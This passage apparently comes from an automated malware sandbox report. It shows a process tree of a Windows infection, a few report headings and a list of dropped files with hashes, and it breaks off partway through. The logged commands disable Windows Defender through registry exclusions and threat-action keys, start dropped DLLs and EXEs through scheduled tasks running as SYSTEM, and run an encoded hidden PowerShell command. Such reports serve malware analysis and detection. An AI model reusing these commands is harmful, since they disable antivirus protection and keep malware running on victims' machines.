                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1992
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3292
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2956
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1020
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3984
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4696
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2320
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:72
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:496
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:236
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4008
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4584
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4348
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:3564
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3552
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:3740
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4844
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4832
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2344
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2720
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3928
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TN "glZmftfLp" /SC once /ST 04:41:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:3356
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /run /I /tn "glZmftfLp"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:404
                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:2144
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /DELETE /F /TN "glZmftfLp"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2732
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 07:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe\" aV /iRHVdidlr 385118 /S" /V1 /F
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:560
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /run /I /tn "yfARWRprRqUFWeTGf"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                PID:4224
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3292
                                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:236
                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:1152
                                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4236
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:2772
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:3896
                                                                                                                                                                                                                                      • C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe
                                                                                                                                                                                                                                        C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe aV /iRHVdidlr 385118 /S
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                        PID:1456
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4500
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:684
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2152
                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:3908
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:2956
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:4492
                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:3756
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3164
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:2344
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:2164
                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:244
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:4452
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:2092
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                              PID:2804
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:1168
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:3056
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:576
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4340
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:1284
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        PID:4352
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                            PID:4688
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\YPGQWq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                    PID:880
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /CREATE /TN "JHJXtPPPvDXVqpH2" /F /xml "C:\Program Files (x86)\zgoZGMcaU\sAfEORO.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                    PID:1196
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                    schtasks /END /TN "JHJXtPPPvDXVqpH"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:4256
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "JHJXtPPPvDXVqpH"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:4904
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "HtmGfIeJlxktuW" /F /xml "C:\Program Files (x86)\epoBtGYzqLvU2\kvuTHLF.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:1980
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "beuYBzgGTLbmn2" /F /xml "C:\ProgramData\pICeQFkDCDDquYVB\UFvFvWg.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:4404
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "ykYfCTTujiceFdOqI2" /F /xml "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qqjiZcs.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:4020
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "fWcEirOkMoMQjrUKaey2" /F /xml "C:\Program Files (x86)\ecOJmsgAHWlsC\AIHTAaQ.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:72
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "aNyMQclguOCSCcjxm" /SC once /ST 08:09:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nlcUipsDcFbdntMB\ievSKAac\KBhwNqJ.dll\",#1 /BdidWxA 385118" /V1 /F
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                        PID:2696
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                        schtasks /run /I /tn "aNyMQclguOCSCcjxm"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4688
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4296
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\ievSKAac\KBhwNqJ.dll",#1 /BdidWxA 385118
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:2732
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\nlcUipsDcFbdntMB\ievSKAac\KBhwNqJ.dll",#1 /BdidWxA 385118
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                              PID:4852
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /DELETE /F /TN "aNyMQclguOCSCcjxm"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:5284

                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              73e7325c0d038abd3a4722542cdbaa51

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              fdacdb3cba20530f852831f4bb65339278fa1351

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              ee5ebe26b61be982f56e7e150e578fe9213d5a74e0ade9f466b29ed7195c7975

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              58e99808a2d4b28e520e7c8060dc717b95806a658cbd2eee60824bb2d956a7332fc252301e39aeb2b1a5242c428613765bf95f29a7379c2ff414348fda6d4ce8

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

